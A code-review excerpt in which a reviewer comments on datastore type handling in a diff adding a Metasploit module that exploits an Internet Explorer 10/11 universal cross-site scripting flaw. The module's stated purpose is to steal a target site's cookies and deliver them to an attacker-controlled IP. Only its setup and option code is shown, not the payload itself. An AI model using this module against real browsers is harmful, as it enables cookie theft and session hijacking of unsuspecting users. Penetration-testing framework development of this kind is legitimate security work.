modules/auxiliary/gather/ie_uxss_cookie.rb

```diff
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microsoft Internet Explorer 10 and 11 Cross-domain Cookie Stealing",
+      'Description'    => %q{
+          This module exploits a universal cross-site scripting vulnerability found in Internet
+          Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
+          datastore option). You will also most likely need to configure the MY_PUBLIC_IP
+          datastore option in order receive the cookie. If you and the victim are actually in the
+          same network, then you don't need to touch MY_PUBLIC_IP.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'David Leo', # Original discovery
+          'sinn3r'     # MSF
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
+          [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
+        ],
+      'Platform'       => 'win',
+      'DisclosureDate' => "Feb 2 2015"
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
+      OptString.new('MY_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
+    ], self.class)
+  end
+
+  def setup
+    if target_uri !~ /^http/i
+      raise Msf::OptionValidateError.new(['TARGET_URI'])
+    end
+
+    super
+  end
+
+  def target_uri
+    @target_uri ||= datastore['TARGET_URI']
+  end
+
+  def get_html
+    @html ||= html
+  end
+
+  def ninja_cookie_stealer_name
+    @ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
+  end
+
+  def get_uri(cli=self.cli)
+    ssl = !!(datastore["SSL"])
```

Comment:
Not really. datastore['SSL'] is always typed as a Boolean, there's no need to ensure it.

Just like you don't have to `datastore['RPORT'].to_i` . You can rely on the validator for that.